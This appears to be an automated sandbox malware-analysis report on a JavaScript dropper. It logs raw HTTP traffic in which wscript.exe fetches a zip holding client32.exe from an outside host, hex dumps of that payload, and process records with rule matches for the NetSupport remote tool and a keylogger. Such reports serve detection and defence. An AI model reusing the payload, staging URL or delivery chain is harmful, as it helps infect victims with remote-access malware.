                                                                                                                                                                              Data Ascii: amp" }, "IssuedAt": { "type": "timestamp" }, "ImportedAt": { "type": "timestamp" }, "RevokedAt": { "type"
                                                                                                                                                                              2024-12-17 17:12:25 UTC8192INData Raw: 63 61 74 69 6f 6e 22 3a 20 22 75 72 69 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 6f 63 61 74 69 6f 6e 4e 61 6d 65 22 3a 20 22 77 6f 72 6b 73 70 61 63 65 49 64 22 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 22 6f 75 74 70 75 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 73 74 72 75 63 74 75 72 65 22 2c 0a 20 20 20 20 20 20 20 20 22 72 65 71 75 69 72 65 64 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 22 61 72 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 22 73 74 61 74 75 73 22 0a 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 6d 62 65 72 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 22
                                                                                                                                                                              Data Ascii: cation": "uri", "locationName": "workspaceId" } } }, "output": { "type": "structure", "required": [ "arn", "name", "status" ], "members": { "
                                                                                                                                                                              2024-12-17 17:12:25 UTC8192INData Raw: 74 68 6f 64 22 3a 20 22 47 45 54 22 2c 0a 20 20 20 20 20 20 20 20 22 72 65 71 75 65 73 74 55 72 69 22 3a 20 22 2f 77 6f 72 6b 73 70 61 63 65 73 2f 7b 77 6f 72 6b 73 70 61 63 65 49 64 7d 2f 72 75 6c 65 67 72 6f 75 70 73 6e 61 6d 65 73 70 61 63 65 73 2f 7b 6e 61 6d 65 7d 22 2c 0a 20 20 20 20 20 20 20 20 22 72 65 73 70 6f 6e 73 65 43 6f 64 65 22 3a 20 32 30 30 0a 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 22 69 6e 70 75 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 73 74 72 75 63 74 75 72 65 22 2c 0a 20 20 20 20 20 20 20 20 22 72 65 71 75 69 72 65 64 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 22 77 6f 72 6b 73 70 61 63 65 49 64 22 0a 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20
                                                                                                                                                                              Data Ascii: thod": "GET", "requestUri": "/workspaces/{workspaceId}/rulegroupsnamespaces/{name}", "responseCode": 200 }, "input": { "type": "structure", "required": [ "name", "workspaceId" ],
                                                                                                                                                                              2024-12-17 17:12:25 UTC8192INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 68 61 70 65 22 3a 20 22 53 31 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 74 61 74 75 73 52 65 61 73 6f 6e 22 3a 20 7b 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 61 67 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 68 61 70 65 22 3a 20 22 53 68 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 4c 69 73 74 54 61 67 73 46 6f 72 52 65 73 6f 75 72 63 65 22 3a 20
                                                                                                                                                                              Data Ascii: "shape": "S15" }, "statusReason": {}, "tags": { "shape": "Sh" } } } } } } }, "ListTagsForResource":
                                                                                                                                                                              2024-12-17 17:12:25 UTC8192INData Raw: 49 64 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 6d 62 65 72 22 3a 20 7b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 22 75 6e 69 6f 6e 22 3a 20 74 72 75 65 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 53 31 35 22 3a 20 7b 0a 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 73 74 72 75 63 74 75 72 65 22 2c 0a 20 20 20 20 20 20 22 72 65 71 75 69 72 65 64 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 22 73 74 61 74 75 73 43 6f 64 65 22 0a 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 22 6d 65 6d 62 65 72 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22
                                                                                                                                                                              Data Ascii: Ids": { "type": "list", "member": {} } } } }, "union": true }, "S15": { "type": "structure", "required": [ "statusCode" ], "members": { "
                                                                                                                                                                              2024-12-17 17:12:25 UTC8192INData Raw: 43 72 65 61 74 65 44 6f 6d 61 69 6e 4e 61 6d 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 68 74 74 70 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 72 65 71 75 65 73 74 55 72 69 22 3a 20 22 2f 64 6f 6d 61 69 6e 6e 61 6d 65 73 22 2c 0a 20 20 20 20 20 20 20 20 22 72 65 73 70 6f 6e 73 65 43 6f 64 65 22 3a 20 32 30 31 0a 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 22 69 6e 70 75 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 73 74 72 75 63 74 75 72 65 22 2c 0a 20 20 20 20 20 20 20 20 22 72 65 71 75 69 72 65 64 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 22 64 6f 6d 61 69 6e 4e 61 6d 65 22 0a 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 6d 62 65 72 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 22 64 6f 6d 61 69 6e 4e 61 6d
                                                                                                                                                                              Data Ascii: CreateDomainName": { "http": { "requestUri": "/domainnames", "responseCode": 201 }, "input": { "type": "structure", "required": [ "domainName" ], "members": { "domainNam
                                                                                                                                                                              2024-12-17 17:12:25 UTC8192INData Raw: 20 20 20 20 20 20 20 20 22 63 6c 69 65 6e 74 43 65 72 74 69 66 69 63 61 74 65 49 64 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 6f 63 61 74 69 6f 6e 22 3a 20 22 75 72 69 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 6f 63 61 74 69 6f 6e 4e 61 6d 65 22 3a 20 22 63 6c 69 65 6e 74 63 65 72 74 69 66 69 63 61 74 65 5f 69 64 22 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 44 65 6c 65 74 65 44 65 70 6c 6f 79 6d 65 6e 74 22 3a 20 7b 0a 20 20 20 20 20 20 22 68 74 74 70 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 44 45 4c 45 54 45 22 2c 0a 20 20 20 20 20 20 20 20 22 72 65 71 75 65 73 74 55 72 69 22 3a 20 22 2f 72 65 73 74 61 70 69 73 2f
                                                                                                                                                                              Data Ascii: "clientCertificateId": { "location": "uri", "locationName": "clientcertificate_id" } } } }, "DeleteDeployment": { "http": { "method": "DELETE", "requestUri": "/restapis/


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.44973898.142.240.2154436896C:\Windows\System32\wscript.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-17 17:12:55 UTC343OUTGET /work/yyy.zip?8982 HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Accept-Language: en-ch
                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                              Host: businessinsanjose.info
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-12-17 17:12:56 UTC261INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 17 Dec 2024 17:12:55 GMT
                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                              Last-Modified: Mon, 16 Dec 2024 11:33:14 GMT
                                                                                                                                                                              ETag: "29d4bb-629618bcb8365"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Length: 2741435
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: application/zip
                                                                                                                                                                              2024-12-17 17:12:56 UTC7931INData Raw: 50 4b 03 04 14 00 00 00 08 00 1d 94 57 57 9d 9e 25 e6 0f 6d 00 00 90 95 01 00 0c 00 00 00 63 6c 69 65 6e 74 33 32 2e 65 78 65 ec 5c 77 5c 54 47 d7 3e 4b 07 01 11 44 25 26 af e8 ab 29 26 12 4d 8c 5f 14 45 14 b1 8b d2 44 60 11 96 8e 15 15 50 a3 24 96 14 15 6b d4 68 34 26 46 91 be 20 c5 02 f6 12 15 a3 c6 d8 12 7b 34 16 7a ef ac 9e ef cc dc 5d 58 14 5c a2 e8 9b 3f 3c bb cf bd 33 77 ce 9c b9 f7 3e 67 ce cc 59 fc 39 c6 6d 35 a8 03 80 06 01 11 60 2f 08 62 0d aa e5 2f 82 61 a7 0c 43 48 d3 3d db 79 af 68 f4 d9 ce 4e 81 41 b3 cc 83 67 4e 0f 98 29 99 6a ee 23 99 36 6d 7a 88 b9 b7 9f f9 cc d0 69 e6 41 d3 cc 87 8c 75 34 9f 3a dd d7 cf c2 c0 40 af ab dc 46 ed 69 ed c3 87 e2 83 d6 2a b0 fb 62 cd da 03 74 8e ec 53 be 76 3f bf 16 b8 36 83 d7 8f ae 3d c8 cf a5 f2 73 19 3f
                                                                                                                                                                              Data Ascii: PKWW%mclient32.exe\w\TG>KD%&)&M_ED`P$kh4&F {4z]X\?<3w>gY9m5`/b/aCH=yhNAgN)j#6mziAu4:@Fi*btSv?6=s?
                                                                                                                                                                              2024-12-17 17:12:56 UTC8000INData Raw: cd 63 e2 51 ea aa 83 3b 03 bb 62 d6 df b7 b0 a2 a6 96 73 c6 fd 45 8e 12 f2 1f e6 47 47 d6 fa 61 94 1d 50 dc 35 79 6a cc 24 02 f3 a1 fd 4b 9c b0 b4 a2 12 cb 08 ca 31 a4 a8 48 f0 bd 7b d7 2f 60 a2 3f db 3b 30 1f 32 25 6e b5 70 ef bc c1 b4 47 29 c6 62 8a 53 75 e3 d2 9a c5 f6 9f 47 57 4b b8 4e a2 87 51 83 f1 52 89 fb 94 26 f8 1f 31 62 04 2a d6 81 a6 a0 8a f3 57 01 eb 41 83 d0 45 4c fc bb f7 c4 9d 1e ad f8 9c 68 11 50 6e 14 43 7b ad df 93 bf 95 f3 5f f6 34 ff d3 3e c0 78 67 35 e2 d2 98 e7 d7 17 76 7d 8f 34 dd 48 a7 98 eb 2a 50 4c 3c d0 12 82 57 8f 27 61 cc 78 c6 83 3e 9f fb 4f 8f 4b 7e 44 7b 58 f6 b7 c2 4b 19 5b 91 fd ef 05 c5 f2 fe 02 c8 8f 4a cb 90 52 3a 3c 97 b8 82 ef 03 92 28 4e 25 b8 12 ff f3 07 35 ca 3f 6d 1b f1 e8 1a 09 c5 16 2d 7a 26 a3 06 e3 a5 79 93
                                                                                                                                                                              Data Ascii: cQ;bsEGGaP5yj$K1H{/`?;02%npG)bSuGWKNQR&1b*WAELhPnC{_4>xg5v}4H*PL<W'ax>OK~D{XK[JR:<(N%5?m-z&y
                                                                                                                                                                              2024-12-17 17:12:56 UTC8000INData Raw: 2a f8 f3 fc 65 19 9a e3 df 1c 8c 4d 4c 31 c1 c4 9a f8 7f 4a fc 7b 12 7f 55 c1 b9 0e 3d 04 ff ac 48 3d 5c 3e bd 1f 4f aa 5f e1 60 f2 12 c1 6b a3 35 95 87 b0 5e 15 e1 31 71 be 71 f5 22 2e 1e df 8b fb 8f 9f e0 e1 8b 97 d8 bf 76 36 e9 b9 32 92 6d b9 ff 0d 71 f5 e2 af 62 8c f6 fd 34 93 c6 ae 63 0d ff 8e 0d f8 f3 18 fc 15 48 fc 83 9d 3f a5 39 d6 93 c6 54 15 5b 7c bb d7 43 0f d1 d7 39 51 c3 71 e5 cc 7e 3c 23 fe 95 9b ff 81 64 bb 76 d8 68 ab 8c 83 bf cc c7 e3 17 d5 78 8a 37 38 9c b6 14 f9 73 27 e3 d2 89 bd 78 cd 7a f4 fb 19 14 c4 4f c0 2f 56 74 fd b4 11 74 7c 56 c8 b9 9f e6 47 aa 7b 47 6c f3 57 c5 14 3d 05 7f 4b 4b 4b 48 32 f0 be 29 f0 b9 c6 32 9a 98 9a 61 a2 99 2d 42 5c 3e 47 9a 5f 6f ea 93 ae c8 f0 53 ab 87 9e 48 75 6d 87 9c 68 7d fc f1 eb 7e bc 7a 5d 8d c3 c4
                                                                                                                                                                              Data Ascii: *eML1J{U=H=\>O_`k5^1qq".v62mqb4cH?9T[|C9Qq~<#dvhx78s'xzO/Vtt|VG{GlW=KKKH2)2a-B\>G_oSHumh}~z]
                                                                                                                                                                              2024-12-17 17:12:56 UTC8000INData Raw: 36 5b 43 c9 0a a7 59 59 e3 56 d6 a3 ed 46 db cd c6 e7 49 34 76 a6 af b8 ba 01 aa 6a be 89 d0 fe f1 99 0c aa 0b 87 1b cd e1 8a aa c3 71 0b 51 75 a3 7a 2e a3 0a a9 be e2 1a 7d 99 dc 38 16 34 42 b0 6a aa 39 d5 dd 0a cf 24 e9 4b 0a 88 24 8d 49 65 92 06 c2 47 4d 1a 40 ce 24 91 b0 ea aa 3f 3c fd a6 fc a6 3d 78 40 8b 41 62 9e 7e 80 09 a7 75 8f e1 31 17 5e c4 91 43 16 3e b3 3f aa 1d 89 cb 71 21 19 b8 d4 96 b4 bb 75 3e da 9d 74 94 7f 46 ff 6a ed 1a 8c dc 35 f5 d9 a1 da dd ae 23 23 9a 82 dd ec 2f b8 9e 75 19 cc d3 c8 cc 66 d5 9a 9e 2e d2 ad e2 0e 33 9c 1a a3 57 4d 6b fb 38 9d 4e f6 dd 52 f9 c6 d3 4c 3a c1 4d 68 b9 fc ec c3 a2 87 9f 57 b6 07 8c 77 3c 9e df 3a f9 5d 92 f5 bd c4 01 1f 5f c6 2e 73 5e 0f 1a a4 a6 17 55 5e 8d dc 54 c0 5a ca 34 5e b4 e4 c8 2f 6a c7 1a 4f
                                                                                                                                                                              Data Ascii: 6[CYYVFI4vjqQuz.}84Bj9$K$IeGM@$?<=x@Ab~u1^C>?q!u>tFj5##/uf.3WMk8NRL:MhWw<:]_.s^U^TZ4^/jO
                                                                                                                                                                              2024-12-17 17:12:56 UTC8000INData Raw: 55 81 7d 9c 3e 75 33 cc 97 aa 22 d8 72 b7 5b 8b 9c 66 19 f5 59 0a 95 d4 92 53 da ab a7 71 6a 70 5b 66 ed 83 78 f4 34 8b 90 a7 cd d5 9d 45 a2 3e 35 c6 c2 4c f7 da fd e5 08 32 6f e0 6f a3 af 1c d7 57 b6 6c d5 06 be ec b7 1b b9 19 c7 02 ec 42 ff 7c 46 3e 81 f7 2d fb b5 9d 3f b0 b4 66 ec 46 64 c7 01 d3 41 ed 7c c0 6e c1 25 f9 ac 81 d5 6a 62 c5 fd bf 63 c5 17 45 a8 82 45 3f de 13 9f 8f 13 b0 5b e4 61 95 2d f4 36 17 82 4a ae 7e 67 0c 59 c1 b9 17 32 4c ef b3 32 da ed e6 97 37 3e d8 5a d8 a6 cb 79 4d f1 c8 21 35 a2 7f fe 2c d9 aa c3 5a e3 9c 56 ed 75 c1 4a 30 a2 cd a4 9f 3e b0 a0 6c fe 18 fd d4 92 5f a7 dd 7b 0e 43 81 37 ad 6f b7 92 33 90 39 c2 96 b2 e2 8d f9 ed 95 2c 7e b4 1a 19 7e 80 ee 9e 56 95 95 fa 1a ca ee 92 67 55 b6 34 78 34 47 0a 1d 9c 89 60 c7 ee 8d d2
                                                                                                                                                                              Data Ascii: U}>u3"r[fYSqjp[fx4E>5L2ooWlB|F>-?fFdA|n%jbcEE?[a-6J~gY2L27>ZyM!5,ZVuJ0>l_{C7o39,~~VgU4x4G`
                                                                                                                                                                              2024-12-17 17:12:56 UTC8000INData Raw: 7f 29 5d ff b3 58 8c b7 34 94 7f 9c 4e 94 7f de b1 a4 d0 a0 1f a8 ee c2 87 e8 85 cd b4 9f 47 2d a0 2d 9c a0 ae c7 a9 b2 70 24 89 26 68 b5 e1 ed ae 7a d1 c7 8e da 06 4c 4d d9 cb ca 74 55 5f 8e 9f 28 6a 76 d4 fe 82 62 30 04 be 1e 5f 0b 5f e4 4d 70 d1 55 0d 71 07 92 28 c6 b0 4e bd 9c c9 ea fa 8e ee 72 24 7b 4a 39 a1 3b 98 86 65 68 f5 98 ca 17 30 44 06 2c 29 34 80 45 31 b4 6e 5d 46 17 15 16 fa 6a 21 21 ed f8 e1 2d 71 e1 81 8c 1a 6c f8 2b 82 08 8c de 69 7b db 78 4b cc f1 9d 2f 27 e8 a4 9c ec 85 ed 65 01 39 28 f9 f9 6c 98 2f 0b 4e 01 bd 03 b7 ac e8 42 fe 9d ec 91 1b c6 c6 20 80 82 27 2c f2 0f a7 bf 51 d4 e4 d0 32 2d 24 a1 cf c4 f7 f7 b0 29 ca 6d b8 21 98 de 22 fb f8 b7 7e 89 33 b5 e3 89 13 12 c9 8e 51 94 e6 83 19 ca f4 01 c8 4d 95 df 93 f6 00 23 eb d1 68 3c 3c
                                                                                                                                                                              Data Ascii: )]X4NG--p$&hzLMtU_(jvb0__MpUq(Nr${J9;eh0D,)4E1n]Fj!!-ql+i{xK/'e9(l/NB ',Q2-$)m!"~3QM#h<<
                                                                                                                                                                              2024-12-17 17:12:56 UTC8000INData Raw: 0d fc 9a 76 d6 37 57 ea fd 46 3e cd 50 ef 42 a3 d1 5c 55 43 f8 be 36 3b 4b 87 06 17 a5 81 ae 0a 79 95 0d df 1a ee 5c a0 46 67 23 f4 c7 20 00 0a d6 a8 a8 ba c4 ee dc 2d 3c 0d 4b e9 e4 e5 58 28 cf 82 67 80 ba 63 3f 76 47 47 44 48 00 dd 48 8c aa 34 fa 7f 2c f5 ff 12 9d 10 c2 df 65 e4 24 82 69 d4 f3 e5 4e d9 eb f3 17 1c 84 5e 3f d4 99 e8 f5 50 09 5f a3 50 69 7f 53 b0 b4 9f 29 58 9a fb b4 ac ac c2 d2 7e 10 e9 d9 f9 b4 6c d2 5d fc 86 c7 44 f1 fc 17 90 b5 e7 e8 39 b5 a2 ca 46 83 6f 4d 73 d1 db 0e ed 4f c8 48 9b 93 8e 7f cc 94 d0 e7 30 eb 0c 39 a6 89 e1 f3 76 e5 07 e7 76 09 86 cb ea 71 20 ab 77 8d 44 df 87 c5 c3 b0 27 5b 66 40 79 69 78 71 d3 8c ab c5 50 52 ef ba 56 50 b4 1a b8 83 95 8f 53 97 5e af e6 30 f7 04 f5 2e bf 76 57 9a 57 0d f8 d4 19 b3 5b fa 58 c4 6d 40
                                                                                                                                                                              Data Ascii: v7WF>PB\UC6;Ky\Fg# -<KX(gc?vGGDHH4,e$iN^?P_PiS)X~l]D9FoMsOH09vvq wD'[f@yixqPRVPS^0.vWW[Xm@
                                                                                                                                                                              2024-12-17 17:12:56 UTC8000INData Raw: 86 71 59 97 55 74 d9 95 39 9b 10 b6 13 7e 96 9f c5 e1 67 70 56 87 f5 a7 30 91 83 2b 42 d8 64 e9 bd f7 d6 7b dd af 3b 1d d0 e3 9c f5 78 c2 eb aa fb aa 6e dd aa 7b ef 57 f7 d5 0f 7f b0 40 7c 73 f6 c8 d1 81 60 89 f4 25 2e bd 46 69 ba 84 2b 8e ba a3 d2 48 5b 4a 38 93 84 cc b4 2e d2 c6 41 2c d7 cf 07 89 02 6a 6d 86 ee b5 97 2a 48 5d 6b 8b 66 d8 f8 ab c1 f8 17 60 1c 1f 76 da bb 9b c1 47 e1 ee bb 14 05 b2 e6 7b d3 e4 a7 da 97 2b fd a6 f1 28 df 03 5d 30 b2 2e 97 79 5c 5e 3e 8f 6e 97 96 42 c7 d1 98 b9 ef b0 db a6 54 e8 25 30 9e 15 30 31 2e b4 bf 3e 69 dc 49 75 97 a6 e8 cb f0 59 9f 04 e3 59 5f 2a 77 8e 2a aa 72 86 07 eb 45 90 a6 0e d0 86 e8 93 3a 33 21 19 7f 4d 95 35 87 be 4c 66 41 89 b5 17 cd 71 65 35 e3 1e c0 80 c0 df 78 90 5f 9d a4 e6 66 35 b7 e2 af c5 72 51 b5
                                                                                                                                                                              Data Ascii: qYUt9~gpV0+Bd{;xn{W@|s`%.Fi+H[J8.A,jm*H]kf`vG{+(]0.y\^>nBT%001.>iIuYY_*w*rE:3!M5LfAqe5x_f5rQ
                                                                                                                                                                              2024-12-17 17:12:56 UTC8000INData Raw: 09 68 5e 12 9e a7 a7 0a 10 dc bb eb 19 4d 20 b6 24 90 0b 0a 08 ee de f7 0c 26 90 5b 63 20 3d a0 9a 1b 73 61 ec ce f1 98 29 eb da 58 96 59 69 72 df 4f a8 7c e3 0c 4f db 50 84 68 fe a6 03 42 b4 f7 d7 ff 14 10 a3 3d 9c 20 0e c5 41 60 4b 2e f0 eb ad 02 a2 a7 bb 80 5b c6 92 4d 57 24 9e 21 15 f7 fb f0 c3 97 62 86 5a c2 7c b5 e0 ff 3c 5f 19 5b 94 f9 6a 7f 13 4d 3b 5d cc 57 81 a6 d1 e2 88 d0 85 78 cf d0 6d 09 79 b5 96 a8 64 3d eb d1 9a 61 92 2d 69 89 1d 56 af b5 9e d5 40 12 7f a5 bb 16 ac b4 66 36 63 14 5d 7b 20 5b cf 82 9b f8 fe 68 6c 57 1a 8a 7c 95 06 27 f6 88 30 ea 73 47 d1 de 28 e7 59 87 4d 2a 69 93 4a 0c b8 cb e7 9a 9f c5 80 b1 5f a2 e9 2d 1a bc 86 fb c5 a5 1a ba 45 e1 2c da 6c 25 06 4b 48 76 6b bd 5a c9 da e0 a0 e8 1f 45 02 4b 1a 78 df ee b4 83 ce 6d b7 41
                                                                                                                                                                              Data Ascii: h^M $&[c =sa)XYirO|OPhB= A`K.[MW$!bZ|<_[jM;]Wxmyd=a-iV@f6c]{ [hlW|'0sG(YM*iJ_-E,l%KHvkZEKxmA
                                                                                                                                                                              2024-12-17 17:12:56 UTC8000INData Raw: ee 15 e7 20 64 c2 b4 4b 38 74 75 12 d1 5b 1c 98 d4 0e 5a 49 63 2a c7 bb 07 d4 8d e1 66 dc 18 de 4b 9c 4b 0c 16 a0 f9 4b d4 06 9e 1d 08 bf 17 e2 5c 8c 5b f9 f2 d6 b5 11 b8 e9 a5 31 00 c2 ab 53 69 b2 0f dd d4 0d 46 64 ea 68 8c 8e 4c c2 bd 7f 51 02 f3 e5 d5 a4 4e 80 86 68 f9 73 47 a3 51 f1 5d 23 aa 8a fa 7a d9 2c 47 f9 bf fe 4d 72 c3 9f 4b a5 b5 f8 be 7c 6e 2a 5a 39 13 47 e2 fe af bf 93 f4 f1 c3 0f 62 68 02 b1 02 21 3b 50 61 58 97 db b8 74 33 08 fc 48 3c a8 e8 19 0b d0 9e d1 f0 51 63 ad d7 f0 31 17 c0 68 72 2e f7 e0 d6 42 07 7f f9 3d 44 82 8e 7a f7 9a d4 2c a4 65 ed 59 bc 2b 29 35 07 b2 63 69 80 c6 a3 39 88 a6 ce a3 ef a9 22 df 43 c9 6b ec 51 36 09 bf 68 7c 53 60 8a 55 f6 17 4e 4f 5d 5e 51 81 35 a0 1d f1 8d 25 04 09 f5 90 70 50 49 60 e9 58 09 d2 29 a5 63 45
                                                                                                                                                                              Data Ascii: dK8tu[ZIc*fKKK\[1SiFdhLQNhsGQ]#z,GMrK|n*Z9Gbh!;PaXt3H<Qc1hr.B=Dz,eY+)5ci9"CkQ6h|S`UNO]^Q5%pPI`X)cE


                                                                                                                                                                              Statistics

                                                                                                                                                                              CPU Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Memory Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Behavior

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              System Behavior

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:12:12:18
                                                                                                                                                                              Start date:17/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5j0fix05fy.js"
                                                                                                                                                                              Imagebase:0x7ff6c9110000
                                                                                                                                                                              File size:170'496 bytes
                                                                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:4
                                                                                                                                                                              Start time:12:13:01
                                                                                                                                                                              Start date:17/12/2024
                                                                                                                                                                              Path:C:\ProgramData\4dvs23l\client32.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\ProgramData\4dvs23l\client32.exe"
                                                                                                                                                                              Imagebase:0xc30000
                                                                                                                                                                              File size:103'824 bytes
                                                                                                                                                                              MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3004861029.0000000000C32000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000000.2143718322.0000000000C32000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\4dvs23l\client32.exe, Author: Joe Security
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 27%, ReversingLabs
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:12:13:05
                                                                                                                                                                              Start date:17/12/2024
                                                                                                                                                                              Path:C:\ProgramData\4dvs23l\client32.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\ProgramData\4dvs23l\client32.exe"
                                                                                                                                                                              Imagebase:0xc30000
                                                                                                                                                                              File size:103'824 bytes
                                                                                                                                                                              MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.2183097774.0000000000C32000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2183914163.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.2183914163.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
